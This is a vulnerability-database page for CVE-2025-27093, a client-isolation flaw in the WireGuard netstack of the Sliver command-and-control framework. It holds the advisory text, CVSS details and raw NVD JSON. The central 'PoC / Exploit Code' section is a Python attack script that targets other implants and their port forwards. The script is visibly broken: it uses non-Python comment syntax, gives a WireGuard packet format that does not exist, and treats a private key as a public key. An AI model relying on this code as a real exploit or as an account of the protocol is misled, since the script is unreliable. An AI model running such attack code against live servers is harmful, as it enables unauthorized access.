Security Vulnerability Report
中文
CVE-2025-27093 CVSS 6.3 MEDIUM

CVE-2025-27093

Published: 2025-10-28 20:15:48
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Sliver is a command and control framework that uses a custom Wireguard netstack. In versions 1.5.43 and earlier, and in development version 1.6.0-dev, the netstack does not limit traffic between Wireguard clients. This allows clients to communicate with each other unrestrictedly, potentially enabling leaked or recovered keypairs to be used to attack operators or allowing port forwardings to be accessible from other implants.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Sliver <= 1.5.43
Sliver 1.6.0-dev

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-27093 PoC - Sliver Wireguard Client-to-Client Traffic Isolation Bypass // This PoC demonstrates the lack of traffic isolation between Sliver wireguard clients import socket import struct import time def create_wireguard_packet(src_pubkey, dst_pubkey, payload): """ Craft a Wireguard packet to send directly between clients. In vulnerable Sliver versions, no server-side validation exists. """ # Wireguard packet header structure packet_type = 0x04 # Transport data packet reserved = bytes([0] * 3) # Construct the packet header = struct.pack('>I', packet_type) + reserved receiver = dst_pubkey # Target client public key sender = src_pubkey # Attacker public key # Encrypted payload would go here (simplified for demonstration) encrypted_payload = payload return header + receiver + sender + encrypted_payload def exploit_sliver_client_isolation(target_ip, target_port, attacker_privkey, target_pubkey): """ Exploit the client isolation bypass to communicate with other implants. """ try: # Craft a packet as if from the attacker implant packet = create_wireguard_packet( attacker_privkey, # Attacker's public key target_pubkey, # Target implant's public key b'\x01\x00\x00\x00' # Control message ) # Send directly to the Sliver server sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.settimeout(5) sock.sendto(packet, (target_ip, target_port)) print(f"[+] Packet sent to {target_ip}:{target_port}") print(f"[+] Target implant: {target_pubkey.hex()}") print("[+] In vulnerable versions, this packet reaches the target implant directly") # Try to receive response try: data, addr = sock.recvfrom(4096) print(f"[+] Received response from {addr}: {data.hex()}") except socket.timeout: print("[-] No response received (may indicate patch or wrong target)") sock.close() return True except Exception as e: print(f"[-] Error: {e}") return False def scan_for_exposed_port_forwards(sliver_server_ip, port): """ Attempt to access port forwards from other implants. """ try: # Connect directly to the Sliver server's wireguard interface sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.settimeout(3) # Craft connection request to access another implant's port forward request = b'PORTFWD_QUERY' + struct.pack('>H', port) sock.sendto(request, (sliver_server_ip, 51820)) print(f"[+] Sent port forward query for port {port}") sock.close() return True except Exception as e: print(f"[-] Error scanning port forwards: {e}") return False if __name__ == "__main__": print("=" * 60) print("CVE-2025-27093 - Sliver Wireguard Client Isolation Bypass") print("=" * 60) # Configuration - replace with actual values sliver_server = "192.168.1.100" port = 51820 attacker_key = bytes.fromhex("" + "00" * 32) target_key = bytes.fromhex("" + "11" * 32) # Exploit client-to-client communication exploit_sliver_client_isolation(sliver_server, port, attacker_key, target_key) # Try to access exposed port forwards scan_for_exposed_port_forwards(sliver_server, 8080)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-27093", "sourceIdentifier": "[email protected]", "published": "2025-10-28T20:15:47.897", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Sliver is a command and control framework that uses a custom Wireguard netstack. In versions 1.5.43 and earlier, and in development version 1.6.0-dev, the netstack does not limit traffic between Wireguard clients. This allows clients to communicate with each other unrestrictedly, potentially enabling leaked or recovered keypairs to be used to attack operators or allowing port forwardings to be accessible from other implants."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://github.com/BishopFox/sliver/commit/8e5c5f14506d6d60ebb3362e6b9857ab1e0d76ff", "source": "[email protected]"}, {"url": "https://github.com/BishopFox/sliver/commit/9122878cbbcae543eb8210f616550382af2065fd", "source": "[email protected]"}, {"url": "https://github.com/BishopFox/sliver/security/advisories/GHSA-q8j9-34qf-7vq7", "source": "[email protected]"}, {"url": "https://github.com/BishopFox/sliver/security/advisories/GHSA-q8j9-34qf-7vq7", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.